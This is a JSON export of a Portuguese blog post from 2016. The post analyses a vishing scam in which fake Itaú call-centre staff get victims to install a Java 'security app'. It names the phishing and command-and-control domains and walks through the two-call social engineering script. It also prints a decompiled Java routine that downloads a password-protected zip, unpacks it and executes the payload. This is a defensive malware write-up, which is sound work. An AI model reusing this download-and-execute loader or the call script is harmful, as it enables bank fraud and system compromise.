{"id":423,"date":"2016-10-31T09:18:31","date_gmt":"2016-10-31T12:18:31","guid":{"rendered":"http:\/\/www.batori.com.br\/blog\/?p=423"},"modified":"2016-11-06T15:35:57","modified_gmt":"2016-11-06T18:35:57","slug":"golpe-virtual-usa-falsa-central-de-atendimento","status":"publish","type":"post","link":"https:\/\/www.batori.com.br\/blog\/golpe-virtual-usa-falsa-central-de-atendimento\/","title":{"rendered":"Golpe virtual usa falsa central de atendimento"},"content":{"rendered":"<p>Al\u00e9m de um malware, um golpe virtual est\u00e1 sendo aplicado atrav\u00e9s de uma central de atendimento ativa falsa.<\/p>\n<p>Centrais de atendimento ativas normalmente ligam para os clientes para oferecer produtos, para fazer cobran\u00e7as ou para resolver eventuais problemas dos clientes.<\/p>\n<p>Neste golpe, observamos que a falsa central de atendimento ligava para os clientes do Banco Ita\u00fa informando a necessidade de instalar um programa de seguran\u00e7a atrav\u00e9s do endere\u00e7o www.itauempresasapp.com. O endere\u00e7o era passado durante a pr\u00f3pria liga\u00e7\u00e3o telef\u00f4nica.<\/p>\n<p>O modo como os falsos funcion\u00e1rios tratam\u00a0a suposta v\u00edtima \u00e9 fundamental para o ganho de confian\u00e7a, em um primeiro momento liga um homem dizendo que \u00e9 funcion\u00e1rio do banco e enfatiza a import\u00e2ncia\u00a0da seguran\u00e7a da informa\u00e7\u00e3o e \u00e9 por este motivo que a atualiza\u00e7\u00e3o do aplicativo \u00e9 necess\u00e1ria e que pelo mesmo motivo de seguran\u00e7a outra pessoa respons\u00e1vel entraria em contato para auxiliar na instala\u00e7\u00e3o.<\/p>\n<p>Aqui podemos observar a t\u00e9cnica de Engenharia Social onde ocorre a tentativa de ganho de confian\u00e7a.<\/p>\n<p>Ap\u00f3s algumas horas ocorreu a liga\u00e7\u00e3o de uma mulher que se identificou como funcion\u00e1ria do setor de TI e respons\u00e1vel pela instala\u00e7\u00e3o do aplicativo, foi neste momento que ela solicitou o acesso a p\u00e1gina falsa e a instala\u00e7\u00e3o do aplicativo, conforme imagem abaixo.<\/p>\n<div id=\"attachment_432\" style=\"width: 310px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.batori.com.br\/blog\/wp-content\/uploads\/2016\/10\/Captura-de-Tela-2016-11-06-a\u0300s-15.35.43.png\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-432\" class=\"wp-image-432 size-medium\" src=\"http:\/\/www.batori.com.br\/blog\/wp-content\/uploads\/2016\/10\/Captura-de-Tela-2016-11-06-a\u0300s-15.35.43-300x226.png\" alt=\"AppItau001\" width=\"300\" height=\"226\" srcset=\"https:\/\/www.batori.com.br\/blog\/wp-content\/uploads\/2016\/10\/Captura-de-Tela-2016-11-06-a\u0300s-15.35.43-300x226.png 300w, https:\/\/www.batori.com.br\/blog\/wp-content\/uploads\/2016\/10\/Captura-de-Tela-2016-11-06-a\u0300s-15.35.43-768x578.png 768w, https:\/\/www.batori.com.br\/blog\/wp-content\/uploads\/2016\/10\/Captura-de-Tela-2016-11-06-a\u0300s-15.35.43.png 808w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-432\" class=\"wp-caption-text\">Tela de instala\u00e7\u00e3o do aplicativo<\/p><\/div>\n<p>Considerando a\u00a0Engenharia Social esta segunda liga\u00e7\u00e3o ocorre pelo fato da v\u00edtima j\u00e1 estar esperando e ciente do fato,\u00a0como ela foi bem tratada na primeira, ela tende a confiar mais nas informa\u00e7\u00f5es da segunda liga\u00e7\u00e3o, a falsa funcion\u00e1ria utilizou o nome de uma artista conhecida para que ocorra mais um ganho de confian\u00e7a e de forma impl\u00edcita.<\/p>\n<p>Ao acessar o endere\u00e7o, a p\u00e1gina falsa baixa o arquivo Aplicativo.jar que \u00e9\u00a0um programa desenvolvido na linguagem java. Atrav\u00e9s do uso de engenharia reversa, foi poss\u00edvel identificar que o programa, se executado, iria baixar mais um arquivo compactado e protegido pela senha &#8220;102030&#8221;, conforme o c\u00f3digo abaixo:<\/p>\n<pre class=\"height-mode:1 lang:java decode:true \">private static void executa(String URL, String local, String nome) {\r\n     try { downloadFile(URL, local + \"\\\\\" + nome);\r\n       \r\n       zip.UnZip(local + \"\\\\\" + nome, local, \"102030\");\r\n       File FileTemp = new File(local + \"\\\\\" + nome);\r\n       FileTemp.delete();\r\n       \r\n       Runtime.getRuntime().exec(\"cmd \/c \\\"\" + local + \"\\\\aplicativo.exe\\\"\");\r\n     }\r\n     catch (Exception localException) {}\r\n}<\/pre>\n<p>Todo este processo realizado pelo malware foi desenvolvimento para dificultar a identifica\u00e7\u00e3o do malware pelo software de antiv\u00edrus. Os softwares de\u00a0antiv\u00edrus n\u00e3o conseguem abrir um arquivo protegido por senha para fazer uma an\u00e1lise mais completa do artefato.<\/p>\n<p>Analisando o arquivo aplicativo.exe foi identificado que sua fun\u00e7\u00e3o principal \u00e9 abrir portas para\u00a0conex\u00e3o externa no computador da v\u00edtima e enviar as informa\u00e7\u00f5es sobre o nome do usu\u00e1rio, nome do computador e as portas abertas para o endere\u00e7o www.brtcontrol.com que registra todas as informa\u00e7\u00f5es e cria\u00a0um banco de dados de computadores infectados.<\/p>\n<p>Possivelmente este Malware foi criado pela ferramenta SET (Social Engineering Toolkit).<\/p>\n<p>Este golpe \u00e9 particularmente perigoso, porque conta, al\u00e9m do uso de um software malicioso (malware), uma falsa central de atendimento proporcionando um contato humano para enganar as v\u00edtimas.<\/p>\n<p>Marcos Fl\u00e1vio Eli Pereira, pesquisador e estudante de seguran\u00e7a da informa\u00e7\u00e3o da Fatec de Americana, recomenda que qualquer acesso aos sites de bancos deve ser realizado somente atrav\u00e9s de computadores confi\u00e1veis, atualizados e protegidos por antiv\u00edrus e firewall. E o mais importante, que sempre seja conferido a autenticidade do site aberto no navegador atrav\u00e9s da verifica\u00e7\u00e3o do certificado digital do site do Banco.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Al\u00e9m de um malware, um golpe virtual est\u00e1 sendo aplicado atrav\u00e9s de uma central de atendimento ativa falsa. Centrais de atendimento ativas normalmente ligam para os clientes para oferecer produtos, para fazer cobran\u00e7as ou para resolver eventuais problemas dos clientes. &hellip; <a href=\"https:\/\/www.batori.com.br\/blog\/golpe-virtual-usa-falsa-central-de-atendimento\/\">Continue lendo <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":227,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,1],"tags":[],"_links":{"self":[{"href":"https:\/\/www.batori.com.br\/blog\/wp-json\/wp\/v2\/posts\/423"}],"collection":[{"href":"https:\/\/www.batori.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.batori.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.batori.com.br\/blog\/wp-json\/wp\/v2\/users\/227"}],"replies":[{"embeddable":true,"href":"https:\/\/www.batori.com.br\/blog\/wp-json\/wp\/v2\/comments?post=423"}],"version-history":[{"count":10,"href":"https:\/\/www.batori.com.br\/blog\/wp-json\/wp\/v2\/posts\/423\/revisions"}],"predecessor-version":[{"id":436,"href":"https:\/\/www.batori.com.br\/blog\/wp-json\/wp\/v2\/posts\/423\/revisions\/436"}],"wp:attachment":[{"href":"https:\/\/www.batori.com.br\/blog\/wp-json\/wp\/v2\/media?parent=423"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.batori.com.br\/blog\/wp-json\/wp\/v2\/categories?post=423"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.batori.com.br\/blog\/wp-json\/wp\/v2\/tags?post=423"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}